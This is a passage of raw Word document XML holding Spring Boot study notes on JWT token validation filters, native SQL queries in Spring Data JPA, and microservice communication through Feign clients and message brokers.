    <w:p w14:paraId="6FA6BB9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tract the Token from Authorization Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A775F9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ing header = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A94C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header != null &amp;&amp; header.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B1C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header.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D10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C6AFA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4A5D7">
          <v:rect id="_x0000_i2655" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E0AB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e a Utility Method to Validate Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FDCEE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boolean validateToken(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF7EF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1A4465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s.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AA07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0C5AC5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  // Validates signature and expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159A7A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3780E3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JwtException | IllegalArgumentException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B38D3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lse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CC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62FFAF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FE8D6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27A9">
          <v:rect id="_x0000_i2656" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182EEA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Extract Username/Claims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670A2E6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extractUsername(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3B01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EA727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6DA0DFA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4FB126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5A1E90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6194D2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4BBC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6D504B">
          <v:rect id="_x0000_i2657" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583C5E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JWT Token Validator Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C8A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filter that runs before every secured endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A2CE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7A96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01EBB55E" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9991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081A1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Util jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F24CA" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48031C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A78556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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571D2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 chain) throws ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E759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nal String authHeader = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C113D73" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6F55B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76375D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 = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500C341" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494F6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authHeader != null &amp;&amp; authHeader.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059DFD3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 = authHeader.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907DE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Util.extractUsername(jwt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA057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DFF60C" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEF326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126E7A6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Util.validateToken(jwt)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AB67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token =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1675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name, null, new ArrayList&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE540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token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9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16008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41F082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158849C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827AE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2A5A3A" w14:textId="07D7FA0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658" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="700353C4" w14:textId="3A2D7035" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="645" w:name="_Toc197867859"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is native queries in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="645"/>
    </w:p>
    <w:p w14:paraId="3245DE82" w14:textId="19DC632E" w:rsidR="00555A08" w:rsidRPr="002C6305" w:rsidRDefault="00555A08"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native queries</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refer to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Native Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002C5C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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries are written using the SQL syntax of the database you're using (e.g., MySQL, PostgreSQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B65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s</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741AF3C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need to use SQL features that are not supported by JPQL (e.g., complex joins, stored procedures, custom SQL functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907C05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o optimize performance for complex queries or to use specific database optimizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B6EF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imitations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C3ED6"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are not portable across different databases, as they depend on the specific SQL dialect of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54537A6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do not support entity mappings or query caching provided by JPA, so you must handle mapping results manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C638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Native Queries in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D38AF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you can use native queries by annotating a repository method with @Query and setting the nativeQuery attribute to true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86D370"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E6A41E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1D6E5EE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3BC20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Native SQL query to find employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F2E8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value = "SELECT * FROM employees WHERE employee_id = ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F9D747"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BC48288"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D056AD"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F99F8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Query annotation is used to write a native SQL query to fetch an employee by their ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D85A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nativeQuery = true attribute indicates that it's a native SQL query, not JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6725EB1A"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ative Query for Stored Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B92195"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native queries to call stored procedures in your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A2280"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601A6C61"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0BCA3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cedure(name = "find_employee_by_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA6B8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F2C1A8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03340A"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Procedure can be used to call a stored procedure defined in your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F052E6"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dvantages of Native Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A937A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write complex queries that aren't possible with JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8729B"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 optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can leverage specific database features for performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E190F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ll control over SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Direct access to SQL allows for full control over the query execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82C904"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sadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766794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The queries are tied to a specific database, reducing portability across different database systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7147053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Native queries can be harder to maintain, especially if the underlying database changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D9B05" w14:textId="2A8740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659" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DC4BD" w14:textId="12A13634" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="646" w:name="_Toc197867860"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where do you use native queries</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="646"/>
    </w:p>
    <w:p w14:paraId="333D5EBD" w14:textId="74280373"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tive queries are typically used in the following scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468589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mplex SQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421AB6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the requirements go beyond what JPQL or HQL can handle, such as complex joins, unions, subqueries, or database-specific SQL functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DFCC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45C134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tching data from multiple tables that is difficult or inefficient to express in JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20197C57"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x aggregate queries that require specific database SQL functions like GROUP BY or HAVING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3C7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e.name, e.salary FROM Employee e JOIN Department d ON e.department_id = d.id WHERE d.name = ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE1F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bject[]&gt; findEmployeesByDepartment(String departmentName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC9819"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Database-Specific Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3BB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use database-specific SQL features like full-text search, window functions, or other advanced SQL operations not supported by JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DE3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659200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 database’s native text search or functions that JPQL does not support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3AB72E"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ing SQL queries optimized for specific databases, such as ROW_NUMBER() or RANK() in PostgreSQL or MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409217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products WHERE MATCH(name) AGAINST (?1 IN NATURAL LANGUAGE MODE)", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9221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Product&gt; searchProductsByName(String searchTerm);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DB2C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erformance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151088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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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E132CA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LIMIT and OFFSET for pagination in databases like MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A47183"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database-specific indexing features or hints that JPQL can't optimize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA3719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WHERE order_date &gt; ?1 LIMIT 10", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48FD1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RecentOrders(Date date);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0721B89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tored Procedures and Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B347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want to call a stored procedure or user-defined function (UDF) that is already implemented in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA5AF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76E0546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lling a stored procedure for complex business logic that is implemented in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711CB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ecuting batch operations directly within the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA2A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CALL GetEmployeeDetails(:empId)", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D9E30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getEmployeeDetailsById(@Param("empId") Long empId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE75F7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igration from SQL-based Legacy Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46C6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migrating from legacy systems that already use SQL heavily and there’s a need to continue leveraging SQL for certain parts of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FCD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32CB23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legacy system may have SQL reports or queries that need to be integrated into a new Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E5BD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employees WHERE employee_code = ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8552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mployee findEmployeeByCode(String employeeCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB79E1"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When JPQL or HQL Is Not Supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F84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JPQL and HQL have limitations, such as not supporting certain SQL features, like SELECT * queries or certain database-specific SQL syntax. In such cases, native SQL queries are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABBD1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268D4B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QL doesn’t support direct SQL functions like CONCAT(), SUBSTRING(), or complex joins with custom filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB425C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Bulk Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1AF65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execute bulk updates or deletes efficiently, native SQL can be used to avoid the overhead of entity management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41699C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0B96A79B"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ing records in bulk without loading entities into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA8991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difying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805A8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DELETE FROM employee WHERE last_login &lt; ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C118F4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deleteInactiveEmployees(Date lastLogin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1805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Database-Specific Query Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C95474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you know the underlying database has specific optimizations or hints that can be leveraged for improved performance, native queries allow you to include those optimizations directly in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC0E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62D447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Oracle-specific optimizations or hints, such as /*+ INDEX(table_name index_name) */, to force the query to use a specific index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A970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 INDEX(orders idx_order_date) */ WHERE order_date &gt; ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53E9E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OrdersByDate(Date date);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A40E29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B5674">
          <v:rect id="_x0000_i2660" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642748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en to Avoid Native Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C603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Native queries are specific to the database, so they will not work if the database is changed. This reduces the portability of the application across different databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482FD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Writing SQL by hand increases the risk of SQL injection or errors and may make code harder to maintain, especially for simple CRUD operations that can be easily handled with JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104ED48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Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native queries don’t benefit from automatic entity mapping by JPA, which means you have to map query results manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38C00F" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B1AE13" w14:textId="213BCD1E"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general, native queries should be used sparingly and only when you require database-specific functionality or optimizations that cannot be achieved with JPQL/HQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D127EB" w14:textId="683D483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5EEA9404">
          <v:rect id="_x0000_i2661" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A47AF" w14:textId="4DB8992E"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47" w:name="_Toc197867861"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose I am having different microservices, if I want to invoke different microservice so how can we interact</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="647"/>
    </w:p>
    <w:p w14:paraId="6B22F25A" w14:textId="0510C2F8"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different microservices in a microservices architecture, you generally use one of the following approaches, depending on the requirements and technologies you are using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B84EC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STful API Calls (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2C0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communicate with each other using </w:t>
      </w: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You can make HTTP requests from one microservice to another using various protocols like HTTP, HTTPS, or gRPC (for more efficient, binary-based communication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA0D4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ically, this can be done using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580676B1"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Template</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (older approach, synchronous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0445F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newer, more reactive, asynchronous approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFBAF4D"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ign Client</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Spring Cloud, declarative HTTP client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80EF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Feign Client (Spring Cloud):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B276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lient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA304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ignClient(name = "service-b", url = "http://localhost:8081")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EF1A9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erviceBClient {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC69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data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D4A2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getDataFromServiceB();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6873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387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troller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E56C7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17E1AE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serviceA")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB8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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F33B1" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714ED96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8F8196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erviceBClient serviceBClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3EA39" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086D6A2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nvokeServiceB")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688DD4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ServiceB() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241747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serviceBClient.getDataFromServiceB();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20A6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FBC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44740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Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73D37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284F6F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12024C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BController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F7E42" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DB9D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data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E0E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74F6D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from Service B";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56058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1E5D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FE50C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uses Feign to interact with Service B's RESTful API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D98F9"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03C6">
          <v:rect id="_x0000_i2662" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5236C3"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essage Brokers (Asynchronous Communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BBA6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synchronous communication, microservices can interact through </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message brokers</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB8F8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croservices can publish messages to a message queue and subscribe to messages from other microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBE4D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is useful when you want decoupling and need to handle things like retries, failovers, and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFA2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Stream and Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEDB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er (Service A)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
